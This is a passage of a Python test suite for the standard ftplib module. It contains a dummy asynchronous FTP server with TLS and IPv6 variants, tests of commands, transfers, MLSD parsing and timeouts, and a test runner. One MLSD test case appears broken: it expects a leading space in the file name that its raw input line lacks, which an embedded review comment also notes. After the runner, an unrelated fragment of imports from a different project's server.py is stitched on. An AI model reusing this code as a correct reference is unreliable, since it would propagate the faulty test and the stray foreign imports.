        self.in_buffer = []
        if self.next_response:
            self.push(self.next_response)
            self.next_response = ''
        cmd = line.split(' ')[0].lower()
        self.last_received_cmd = cmd
        space = line.find(' ')
        if space != -1:
            arg = line[space + 1:]
        else:
            arg = ''
        if hasattr(self, 'cmd_' + cmd):
            method = getattr(self, 'cmd_' + cmd)
            method(arg)
        else:
            self.push('550 command "%s" not understood.' % cmd)
    def handle_error(self):
        # Fail loudly: asyncore would otherwise swallow the exception.
        raise Exception
    def push(self, data):
        asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
    def cmd_port(self, arg):
        # Active mode: parse "h1,h2,h3,h4,p1,p2" and connect back to the client.
        addr = list(map(int, arg.split(',')))
        ip = '%d.%d.%d.%d' % tuple(addr[:4])
        port = addr[4] * 256 + addr[5]
        s = socket.create_connection((ip, port), timeout=TIMEOUT)
        self.dtp = self.dtp_handler(s, baseclass=self)
        self.push('200 active data connection established')
    def cmd_pasv(self, arg):
        # Passive mode: listen on an ephemeral port and advertise it.
        with socket.socket() as sock:
            sock.bind((self.socket.getsockname()[0], 0))
            sock.listen()
            sock.settimeout(TIMEOUT)
            ip, port = sock.getsockname()[:2]
            ip = ip.replace('.', ',')
            # Integer split of the port into high/low bytes.  The original
            # "port / 256" produced a float and only worked because %d
            # truncates; divmod makes the intent explicit.
            p1, p2 = divmod(port, 256)
            self.push('227 entering passive mode (%s,%d,%d)' % (ip, p1, p2))
            conn, addr = sock.accept()
            self.dtp = self.dtp_handler(conn, baseclass=self)
    def cmd_eprt(self, arg):
        # Extended active mode (RFC 2428): "|af|ip|port|".
        af, ip, port = arg.split(arg[0])[1:-1]
        port = int(port)
        s = socket.create_connection((ip, port), timeout=TIMEOUT)
        self.dtp = self.dtp_handler(s, baseclass=self)
        self.push('200 active data connection established')
    def cmd_epsv(self, arg):
        # Extended passive mode (RFC 2428), IPv6 listener.
        with socket.socket(socket.AF_INET6) as sock:
            sock.bind((self.socket.getsockname()[0], 0))
            sock.listen()
            sock.settimeout(TIMEOUT)
            port = sock.getsockname()[1]
            self.push('229 entering extended passive mode (|||%d|)' % port)
            conn, addr = sock.accept()
            self.dtp = self.dtp_handler(conn, baseclass=self)
    def cmd_echo(self, arg):
        # sends back the received string (used by the test suite)
        self.push(arg)
    def cmd_noop(self, arg):
        self.push('200 noop ok')
    def cmd_user(self, arg):
        self.push('331 username ok')
    def cmd_pass(self, arg):
        self.push('230 password ok')
    def cmd_acct(self, arg):
        self.push('230 acct ok')
    def cmd_rnfr(self, arg):
        self.push('350 rnfr ok')
    def cmd_rnto(self, arg):
        self.push('250 rnto ok')
    def cmd_dele(self, arg):
        self.push('250 dele ok')
    def cmd_cwd(self, arg):
        self.push('250 cwd ok')
    def cmd_size(self, arg):
        self.push('250 1000')
    def cmd_mkd(self, arg):
        self.push('257 "%s"' % arg)
    def cmd_rmd(self, arg):
        self.push('250 rmd ok')
    def cmd_pwd(self, arg):
        self.push('257 "pwd ok"')
    def cmd_type(self, arg):
        self.push('200 type ok')
    def cmd_quit(self, arg):
        self.push('221 quit ok')
        self.close()
    def cmd_abor(self, arg):
        self.push('226 abor ok')
    def cmd_stor(self, arg):
        self.push('125 stor ok')
    def cmd_rest(self, arg):
        # Remember the restart offset for the next RETR.
        self.rest = arg
        self.push('350 rest ok')
    def cmd_retr(self, arg):
        self.push('125 retr ok')
        # Honour a preceding REST command, then clear it (one-shot).
        if self.rest is not None:
            offset = int(self.rest)
        else:
            offset = 0
        self.dtp.push(self.next_retr_data[offset:])
        self.dtp.close_when_done()
        self.rest = None
    def cmd_list(self, arg):
        self.push('125 list ok')
        self.dtp.push(LIST_DATA)
        self.dtp.close_when_done()
    def cmd_nlst(self, arg):
        self.push('125 nlst ok')
        self.dtp.push(NLST_DATA)
        self.dtp.close_when_done()
    def cmd_opts(self, arg):
        self.push('200 opts ok')
    def cmd_mlsd(self, arg):
        self.push('125 mlsd ok')
        self.dtp.push(MLSD_DATA)
        self.dtp.close_when_done()
    def cmd_setlongretr(self, arg):
        # For testing. Next RETR will return long line.
        self.next_retr_data = 'x' * int(arg)
        self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
    """Asynchronous FTP server accepting one connection at a time.

    Runs the asyncore polling loop in its own thread; ``start``/``stop``
    synchronize with that thread via an event and a join.
    """

    handler = DummyFTPHandler

    def __init__(self, address, af=socket.AF_INET):
        threading.Thread.__init__(self)
        asyncore.dispatcher.__init__(self)
        self.create_socket(af, socket.SOCK_STREAM)
        self.bind(address)
        self.listen(5)
        self.active = False
        self.active_lock = threading.Lock()
        # Bound host/port (port 0 in `address` means the OS picked one).
        self.host, self.port = self.socket.getsockname()[:2]
        self.handler_instance = None

    def start(self):
        assert not self.active
        self.__flag = threading.Event()
        threading.Thread.start(self)
        # Block until run() has actually entered the loop.
        self.__flag.wait()

    def run(self):
        self.active = True
        self.__flag.set()
        while self.active and asyncore.socket_map:
            # Lock around each poll iteration so stop() can't race it.
            self.active_lock.acquire()
            asyncore.loop(timeout=0.1, count=1)
            self.active_lock.release()
        asyncore.close_all(ignore_all=True)

    def stop(self):
        assert self.active
        self.active = False
        self.join()

    def handle_accepted(self, conn, addr):
        self.handler_instance = self.handler(conn)

    def handle_connect(self):
        self.close()
    # Treat unexpected reads on the listening socket like a stray connect.
    handle_read = handle_connect

    def writable(self):
        # The listening socket never has data to send.
        return 0

    def handle_error(self):
        # Fail loudly instead of asyncore's default logging.
        raise Exception
if ssl is not None:

    CERTFILE = os.path.join(os.path.dirname(__file__), 'keycert3.pem')
    CAFILE = os.path.join(os.path.dirname(__file__), 'pycacert.pem')

    class SSLConnection(asyncore.dispatcher):
        """An asyncore.dispatcher subclass supporting TLS/SSL."""
        # State flags for the non-blocking handshake / shutdown machines.
        _ssl_accepting = False
        _ssl_closing = False

        def secure_connection(self):
            # Wrap the plain socket in a server-side SSL socket; the
            # handshake is completed incrementally from the event loop.
            context = ssl.SSLContext()
            context.load_cert_chain(CERTFILE)
            socket = context.wrap_socket(self.socket,
                                         suppress_ragged_eofs=False,
                                         server_side=True,
                                         do_handshake_on_connect=False)
            self.del_channel()
            self.set_socket(socket)
            self._ssl_accepting = True

        def _do_ssl_handshake(self):
            try:
                self.socket.do_handshake()
            except ssl.SSLError as err:
                # WANT_READ/WANT_WRITE: retry on the next poll event.
                if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return
                elif err.args[0] == ssl.SSL_ERROR_EOF:
                    return self.handle_close()
                raise
            except OSError as err:
                if err.args[0] == errno.ECONNABORTED:
                    return self.handle_close()
            else:
                # Handshake finished; resume normal event handling.
                self._ssl_accepting = False

        def _do_ssl_shutdown(self):
            self._ssl_closing = True
            try:
                # unwrap() returns the underlying plain socket.
                self.socket = self.socket.unwrap()
            except ssl.SSLError as err:
                if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return
            except OSError as err:
                # Peer may have already torn the connection down.
                pass
            self._ssl_closing = False
            if getattr(self, '_ccc', False) is False:
                super(SSLConnection, self).close()
            else:
                # CCC: keep the (now clear-text) connection open.
                pass

        def handle_read_event(self):
            if self._ssl_accepting:
                self._do_ssl_handshake()
            elif self._ssl_closing:
                self._do_ssl_shutdown()
            else:
                super(SSLConnection, self).handle_read_event()

        def handle_write_event(self):
            if self._ssl_accepting:
                self._do_ssl_handshake()
            elif self._ssl_closing:
                self._do_ssl_shutdown()
            else:
                super(SSLConnection, self).handle_write_event()

        def send(self, data):
            try:
                return super(SSLConnection, self).send(data)
            except ssl.SSLError as err:
                # Treat transient/terminal SSL conditions as "wrote 0 bytes".
                if err.args[0] in (ssl.SSL_ERROR_EOF,
                                   ssl.SSL_ERROR_ZERO_RETURN,
                                   ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return 0
                raise

        def recv(self, buffer_size):
            try:
                return super(SSLConnection, self).recv(buffer_size)
            except ssl.SSLError as err:
                if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
                                   ssl.SSL_ERROR_WANT_WRITE):
                    return b''
                if err.args[0] in (ssl.SSL_ERROR_EOF,
                                   ssl.SSL_ERROR_ZERO_RETURN):
                    self.handle_close()
                    return b''
                raise

        def handle_error(self):
            # Fail loudly instead of asyncore's default logging.
            raise Exception

        def close(self):
            # Shut TLS down cleanly if the SSL layer is still live.
            if (isinstance(self.socket, ssl.SSLSocket) and
                    self.socket._sslobj is not None):
                self._do_ssl_shutdown()
            else:
                super(SSLConnection, self).close()
    class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
        """A DummyDTPHandler subclass supporting TLS/SSL."""

        def __init__(self, conn, baseclass):
            DummyDTPHandler.__init__(self, conn, baseclass)
            # Only wrap the data channel if PROT P was negotiated.
            if self.baseclass.secure_data_channel:
                self.secure_connection()
    class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
        """A DummyFTPHandler subclass supporting TLS/SSL."""
        dtp_handler = DummyTLS_DTPHandler

        def __init__(self, conn):
            DummyFTPHandler.__init__(self, conn)
            self.secure_data_channel = False
            self._ccc = False  # True once CCC reverted to clear-text

        def cmd_auth(self, line):
            """Set up secure control channel."""
            self.push('234 AUTH TLS successful')
            self.secure_connection()

        def cmd_ccc(self, line):
            # Clear Command Channel: drop TLS but keep the connection.
            self.push('220 Reverting back to clear-text')
            self._ccc = True
            self._do_ssl_shutdown()

        def cmd_pbsz(self, line):
            """Negotiate size of buffer for secure data transfer.
            For TLS/SSL the only valid value for the parameter is '0'.
            Any other value is accepted but ignored.
            """
            self.push('200 PBSZ=0 successful.')

        def cmd_prot(self, line):
            """Setup un/secure data channel."""
            arg = line.upper()
            if arg == 'C':
                self.push('200 Protection set to Clear')
                self.secure_data_channel = False
            elif arg == 'P':
                self.push('200 Protection set to Private')
                self.secure_data_channel = True
            else:
                self.push('502 Unrecognized PROT type (use C or P).')
    # Same server, but every control connection speaks the TLS handler.
    class DummyTLS_FTPServer(DummyFTPServer):
        handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
    """Exercise ftplib.FTP against the in-process dummy server."""

    def setUp(self):
        self.server = DummyFTPServer((HOST, 0))
        self.server.start()
        self.client = ftplib.FTP(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)

    def tearDown(self):
        self.client.close()
        self.server.stop()

    def check_data(self, received, expected):
        # Length first so a mismatch reports a short diff before the payload.
        self.assertEqual(len(received), len(expected))
        self.assertEqual(received, expected)

    def test_getwelcome(self):
        self.assertEqual(self.client.getwelcome(), '220 welcome')

    def test_sanitize(self):
        # Passwords must be masked in debug output.
        self.assertEqual(self.client.sanitize('foo'), repr('foo'))
        self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
        self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))

    def test_exceptions(self):
        # Reply-code ranges map onto the ftplib exception hierarchy.
        self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
        self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
        self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
        self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
        self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')

    def test_all_errors(self):
        # Every exception a caller might see is caught by ftplib.all_errors.
        exceptions = (ftplib.error_reply, ftplib.error_temp,
                      ftplib.error_perm, ftplib.error_proto,
                      ftplib.Error, OSError, EOFError)
        for x in exceptions:
            try:
                raise x('exception not included in all_errors set')
            except ftplib.all_errors:
                pass

    def test_set_pasv(self):
        # Passive mode is the default.
        self.assertTrue(self.client.passiveserver)
        self.client.set_pasv(True)
        self.assertTrue(self.client.passiveserver)
        self.client.set_pasv(False)
        self.assertFalse(self.client.passiveserver)

    def test_voidcmd(self):
        # voidcmd accepts only 2xx replies.
        self.client.voidcmd('echo 200')
        self.client.voidcmd('echo 299')
        self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
        self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')

    def test_login(self):
        self.client.login()

    def test_acct(self):
        self.client.acct('passwd')

    def test_rename(self):
        self.client.rename('a', 'b')
        # Force an unexpected reply to the RNFR half of the exchange.
        self.server.handler_instance.next_response = '200'
        self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')

    def test_delete(self):
        self.client.delete('foo')
        self.server.handler_instance.next_response = '199'
        self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')

    def test_size(self):
        self.client.size('foo')

    def test_mkd(self):
        dir = self.client.mkd('/foo')
        self.assertEqual(dir, '/foo')

    def test_rmd(self):
        self.client.rmd('foo')

    def test_cwd(self):
        dir = self.client.cwd('/foo')
        self.assertEqual(dir, '250 cwd ok')

    def test_pwd(self):
        dir = self.client.pwd()
        self.assertEqual(dir, 'pwd ok')

    def test_quit(self):
        self.assertEqual(self.client.quit(), '221 quit ok')
        # The control socket must be closed after QUIT.
        self.assertEqual(self.client.sock, None)

    def test_abort(self):
        self.client.abort()

    def test_retrbinary(self):
        def callback(data):
            received.append(data.decode('ascii'))
        received = []
        self.client.retrbinary('retr', callback)
        self.check_data(''.join(received), RETR_DATA)

    def test_retrbinary_rest(self):
        # REST should make RETR resume at the given offset.
        def callback(data):
            received.append(data.decode('ascii'))
        for rest in (0, 10, 20):
            received = []
            self.client.retrbinary('retr', callback, rest=rest)
            self.check_data(''.join(received), RETR_DATA[rest:])

    def test_retrlines(self):
        received = []
        self.client.retrlines('retr', received.append)
        self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))

    def test_storbinary(self):
        f = io.BytesIO(RETR_DATA.encode('ascii'))
        self.client.storbinary('stor', f)
        self.check_data(self.server.handler_instance.last_received_data,
                        RETR_DATA)
        # The optional per-block callback must be invoked.
        flag = []
        f.seek(0)
        self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
        self.assertTrue(flag)

    def test_storbinary_rest(self):
        # rest may be given as int or str; the server records it as str.
        f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
        for r in (30, '30'):
            f.seek(0)
            self.client.storbinary('stor', f, rest=r)
            self.assertEqual(self.server.handler_instance.rest, str(r))

    def test_storlines(self):
        f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
        self.client.storlines('stor', f)
        self.check_data(self.server.handler_instance.last_received_data,
                        RETR_DATA)
        # The optional per-line callback must be invoked.
        flag = []
        f.seek(0)
        self.client.storlines('stor foo', f,
                              callback=lambda x: flag.append(None))
        self.assertTrue(flag)

        # storlines requires a binary file object.
        f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
        with support.check_warnings(('', BytesWarning), quiet=True):
            self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)

    def test_nlst(self):
        self.client.nlst()
        self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])

    def test_dir(self):
        l = []
        self.client.dir(lambda x: l.append(x))
        self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))

    def test_mlsd(self):
        list(self.client.mlsd())
        list(self.client.mlsd(path='/'))
        list(self.client.mlsd(path='/', facts=['size', 'type']))

        ls = list(self.client.mlsd())
        for name, facts in ls:
            self.assertIsInstance(name, str)
            self.assertIsInstance(facts, dict)
            self.assertTrue(name)
            self.assertIn('type', facts)
            self.assertIn('perm', facts)
            self.assertIn('unique', facts)

        def set_data(data):
            self.server.handler_instance.next_data = data

        def test_entry(line, type=None, perm=None, unique=None, name=None):
            # Push one raw MLSD line and check how it is parsed.
            type = 'type' if type is None else type
            perm = 'perm' if perm is None else perm
            unique = 'unique' if unique is None else unique
            name = 'name' if name is None else name
            set_data(line)
            _name, facts = next(self.client.mlsd())
            self.assertEqual(_name, name)
            self.assertEqual(facts['type'], type)
            self.assertEqual(facts['perm'], perm)
            self.assertEqual(facts['unique'], unique)

        test_entry('type=type;perm=perm;unique=unique; name\r\n')
        # "=" inside a fact value is preserved verbatim.
        test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type='ty=pe')
        test_entry('type==type;perm=perm;unique=unique; name\r\n', type='=type')
        test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n',
                   type='t=y=pe')
        test_entry('type=====;perm=perm;unique=unique; name\r\n', type='====')
        # Spaces, semicolons etc. in the file name are preserved.
        test_entry('type=type;perm=perm;unique=unique; na me\r\n', name='na me')
        test_entry('type=type;perm=perm;unique=unique; name \r\n', name='name ')
        # NOTE(review): for name=' name' the raw line should contain TWO
        # spaces after the last ';' (separator + leading space of the name);
        # a space looks lost here — confirm against upstream test_ftplib.
        test_entry('type=type;perm=perm;unique=unique; name\r\n', name=' name')
        test_entry('type=type;perm=perm;unique=unique; n am e\r\n',
                   name='n am e')
        test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name='na;me')
        test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=';name')
        test_entry('type=type;perm=perm;unique=unique; ;name;\r\n',
                   name=';name;')
        test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=';;;;')
        # Fact names are case-insensitive and returned lowercased.
        set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
        _name, facts = next(self.client.mlsd())
        for x in facts:
            self.assertTrue(x.islower())
        # An empty payload yields an empty iterator.
        set_data('')
        self.assertRaises(StopIteration, next, self.client.mlsd())
        set_data('')
        for x in self.client.mlsd():
            self.fail('unexpected data %s' % x)

    def test_makeport(self):
        with self.client.makeport():
            self.assertEqual(self.server.handler_instance.last_received_cmd,
                             'port')

    def test_makepasv(self):
        host, port = self.client.makepasv()
        conn = socket.create_connection((host, port), timeout=TIMEOUT)
        conn.close()
        self.assertEqual(self.server.handler_instance.last_received_cmd,
                         'pasv')

    def test_with_statement(self):
        self.client.quit()

        def is_client_connected():
            if self.client.sock is None:
                return False
            try:
                self.client.sendcmd('noop')
            except (OSError, EOFError):
                return False
            return True

        # Leaving the with block must send QUIT and close the socket.
        with ftplib.FTP(timeout=TIMEOUT) as self.client:
            self.client.connect(self.server.host, self.server.port)
            self.client.sendcmd('noop')
            self.assertTrue(is_client_connected())
        self.assertEqual(self.server.handler_instance.last_received_cmd,
                         'quit')
        self.assertFalse(is_client_connected())

        # Quitting inside the block must not break __exit__.
        with ftplib.FTP(timeout=TIMEOUT) as self.client:
            self.client.connect(self.server.host, self.server.port)
            self.client.sendcmd('noop')
            self.client.quit()
        self.assertEqual(self.server.handler_instance.last_received_cmd,
                         'quit')
        self.assertFalse(is_client_connected())

        # A 550 reply to QUIT should surface as error_perm from __exit__.
        try:
            with ftplib.FTP(timeout=TIMEOUT) as self.client:
                self.client.connect(self.server.host, self.server.port)
                self.client.sendcmd('noop')
                self.server.handler_instance.next_response = (
                    '550 error on quit')
        except ftplib.error_perm as err:
            self.assertEqual(str(err), '550 error on quit')
        else:
            self.fail('Exception not raised')
        # Give the threaded server time to record the QUIT command.
        time.sleep(0.1)
        self.assertEqual(self.server.handler_instance.last_received_cmd,
                         'quit')
        self.assertFalse(is_client_connected())

    def test_source_address(self):
        self.client.quit()
        port = support.find_unused_port()
        try:
            self.client.connect(self.server.host, self.server.port,
                                source_address=(HOST, port))
            self.assertEqual(self.client.sock.getsockname()[1], port)
            self.client.quit()
        except OSError as e:
            # Another process may have grabbed the port meanwhile.
            if e.errno == errno.EADDRINUSE:
                self.skipTest("couldn't bind to port %d" % port)
            raise

    def test_source_address_passive_connection(self):
        port = support.find_unused_port()
        self.client.source_address = HOST, port
        try:
            with self.client.transfercmd('list') as sock:
                self.assertEqual(sock.getsockname()[1], port)
        except OSError as e:
            if e.errno == errno.EADDRINUSE:
                self.skipTest("couldn't bind to port %d" % port)
            raise

    def test_parse257(self):
        self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
        self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
        self.assertEqual(ftplib.parse257('257 ""'), '')
        self.assertEqual(ftplib.parse257('257 "" created'), '')
        self.assertRaises(ftplib.error_reply, ftplib.parse257,
                          '250 "/foo/bar"')
        # A doubled quote inside the path is an escaped quote (RFC 959).
        self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
        self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'),
                         '/foo/b"ar')

    def test_line_too_long(self):
        self.assertRaises(ftplib.Error, self.client.sendcmd,
                          'x' * self.client.maxline * 2)

    def test_retrlines_too_long(self):
        self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
        received = []
        self.assertRaises(ftplib.Error, self.client.retrlines, 'retr',
                          received.append)

    def test_storlines_too_long(self):
        f = io.BytesIO(b'x' * self.client.maxline * 2)
        self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, 'IPv6 not enabled')
class TestIPv6Environment(TestCase):
    """Exercise the IPv6 code paths (EPRT/EPSV) of ftplib.FTP."""

    def setUp(self):
        self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
        self.server.start()
        self.client = ftplib.FTP(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)

    def tearDown(self):
        self.client.close()
        self.server.stop()

    def test_af(self):
        self.assertEqual(self.client.af, socket.AF_INET6)

    def test_makeport(self):
        # Over IPv6 the client must use EPRT rather than PORT.
        with self.client.makeport():
            self.assertEqual(self.server.handler_instance.last_received_cmd,
                             'eprt')

    def test_makepasv(self):
        # Over IPv6 the client must use EPSV rather than PASV.
        host, port = self.client.makepasv()
        conn = socket.create_connection((host, port), timeout=TIMEOUT)
        conn.close()
        self.assertEqual(self.server.handler_instance.last_received_cmd,
                         'epsv')

    def test_transfer(self):
        def retr():
            def callback(data):
                received.append(data.decode('ascii'))
            received = []
            self.client.retrbinary('retr', callback)
            self.assertEqual(len(''.join(received)), len(RETR_DATA))
            self.assertEqual(''.join(received), RETR_DATA)
        # Exercise both passive and active transfers.
        self.client.set_pasv(True)
        retr()
        self.client.set_pasv(False)
        retr()
@skipUnless(ssl, 'SSL not available')
class TestTLS_FTPClassMixin(TestFTPClass):
    """Repeat TestFTPClass tests starting the TLS layer for both control
    and data connections first.
    """

    def setUp(self):
        self.server = DummyTLS_FTPServer((HOST, 0))
        self.server.start()
        self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)
        # Secure the control channel (AUTH) and data channel (PROT P)
        # before every inherited test runs.
        self.client.auth()
        self.client.prot_p()
@skipUnless(ssl, 'SSL not available')
class TestTLS_FTPClass(TestCase):
    """Specific TLS_FTP class tests."""

    def setUp(self):
        self.server = DummyTLS_FTPServer((HOST, 0))
        self.server.start()
        self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)

    def tearDown(self):
        self.client.close()
        self.server.stop()

    def test_control_connection(self):
        # AUTH upgrades the control socket to SSL.
        self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.auth()
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)

    def test_data_connection(self):
        # Clear by default, secured by PROT P, cleared again by PROT C.
        with self.client.transfercmd('list') as sock:
            self.assertNotIsInstance(sock, ssl.SSLSocket)
        self.assertEqual(self.client.voidresp(), '226 transfer complete')

        self.client.prot_p()
        with self.client.transfercmd('list') as sock:
            self.assertIsInstance(sock, ssl.SSLSocket)
        self.assertEqual(self.client.voidresp(), '226 transfer complete')

        self.client.prot_c()
        with self.client.transfercmd('list') as sock:
            self.assertNotIsInstance(sock, ssl.SSLSocket)
        self.assertEqual(self.client.voidresp(), '226 transfer complete')

    def test_login(self):
        # login() secures the control connection implicitly, once.
        self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.login()
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)
        # A second login must not re-issue AUTH.
        self.client.login()

    def test_auth_issued_twice(self):
        self.client.auth()
        self.assertRaises(ValueError, self.client.auth)

    def test_auth_ssl(self):
        try:
            self.client.ssl_version = ssl.PROTOCOL_SSLv23
            self.client.auth()
            self.assertRaises(ValueError, self.client.auth)
        finally:
            self.client.ssl_version = ssl.PROTOCOL_TLSv1

    def test_context(self):
        self.client.quit()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # context is mutually exclusive with keyfile/certfile.
        self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
                          context=ctx)
        self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
                          context=ctx)
        self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
                          keyfile=CERTFILE, context=ctx)

        self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)
        self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.auth()
        # The supplied context must be used for both channels.
        self.assertIs(self.client.sock.context, ctx)
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)

        self.client.prot_p()
        with self.client.transfercmd('list') as sock:
            self.assertIs(sock.context, ctx)
            self.assertIsInstance(sock, ssl.SSLSocket)

    def test_ccc(self):
        # CCC is only valid once the control channel is secured.
        self.assertRaises(ValueError, self.client.ccc)
        self.client.login(secure=True)
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.ccc()
        self.assertRaises(ValueError, self.client.sock.unwrap)

    def test_check_hostname(self):
        self.client.quit()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.verify_mode = ssl.CERT_REQUIRED
        ctx.check_hostname = True
        ctx.load_verify_locations(CAFILE)
        self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)

        # The numeric server.host doesn't match the certificate's hostname,
        # so hostname checking must fail on both channels...
        self.client.connect(self.server.host, self.server.port)
        with self.assertRaises(ssl.CertificateError):
            self.client.auth()
        self.client.connect(self.server.host, self.server.port)
        self.client.prot_p()
        with self.assertRaises(ssl.CertificateError):
            with self.client.transfercmd('list') as sock:
                pass
        self.client.quit()

        # ...while 'localhost' matches and succeeds on both.
        self.client.connect('localhost', self.server.port)
        self.client.auth()
        self.client.quit()
        self.client.connect('localhost', self.server.port)
        self.client.prot_p()
        with self.client.transfercmd('list') as sock:
            pass
class TestTimeouts(TestCase):
    """Check how FTP constructor/connect timeouts reach the socket."""

    def setUp(self):
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(20)
        self.port = support.bind_port(self.sock)
        self.server_thread = threading.Thread(target=self.server)
        self.server_thread.start()
        # Wait for the server to be ready, then reuse the event to learn
        # when it has finished serving.
        self.evt.wait()
        self.evt.clear()
        # Redirect ftplib's default port at our throwaway server.
        self.old_port = ftplib.FTP.port
        ftplib.FTP.port = self.port

    def tearDown(self):
        ftplib.FTP.port = self.old_port
        self.server_thread.join()

    def server(self):
        # One-shot server: accept a single connection, greet, shut down.
        self.sock.listen()
        self.evt.set()
        try:
            conn, addr = self.sock.accept()
        except socket.timeout:
            pass
        else:
            conn.sendall(b'1 Hola mundo\n')
            conn.shutdown(socket.SHUT_WR)
            self.evt.set()
            conn.close()
        finally:
            self.sock.close()

    def testTimeoutDefault(self):
        # No timeout argument: inherit socket.getdefaulttimeout().
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            ftp = ftplib.FTP(HOST)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutNone(self):
        # timeout=None overrides the global default: blocking socket.
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            ftp = ftplib.FTP(HOST, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertIsNone(ftp.sock.gettimeout())
        self.evt.wait()
        ftp.close()

    def testTimeoutValue(self):
        # Timeout passed to the constructor.
        ftp = ftplib.FTP(HOST, timeout=30)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutConnect(self):
        # Timeout passed to connect().
        ftp = ftplib.FTP()
        ftp.connect(HOST, timeout=30)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutDifferentOrder(self):
        # Timeout set in constructor, connect() called separately.
        ftp = ftplib.FTP(timeout=30)
        ftp.connect(HOST)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutDirectAccess(self):
        # Timeout assigned directly to the attribute before connect().
        ftp = ftplib.FTP()
        ftp.timeout = 30
        ftp.connect(HOST)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()
class MiscTestCase(TestCase):
    def test__all__(self):
        # Names deliberately excluded from ftplib.__all__.
        blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
                     'Error', 'parse150', 'parse227', 'parse229', 'parse257',
                     'print_line', 'ftpcp', 'test'}
        support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
    """Run the whole suite, verifying that no threads are leaked."""
    suite = [
        TestFTPClass,
        TestTimeouts,
        TestIPv6Environment,
        TestTLS_FTPClassMixin,
        TestTLS_FTPClass,
        MiscTestCase,
    ]
    saved_thread_info = support.threading_setup()
    try:
        support.run_unittest(*suite)
    finally:
        support.threading_cleanup(*saved_thread_info)


if __name__ == '__main__':
    test_main()
# --- server.py ---
import hmac
import json
import urllib.parse
from .main import (
PullReqState,
parse_commands,
db_query,
INTERRUPTED_BY_HOMU_RE,
synchronize,
)
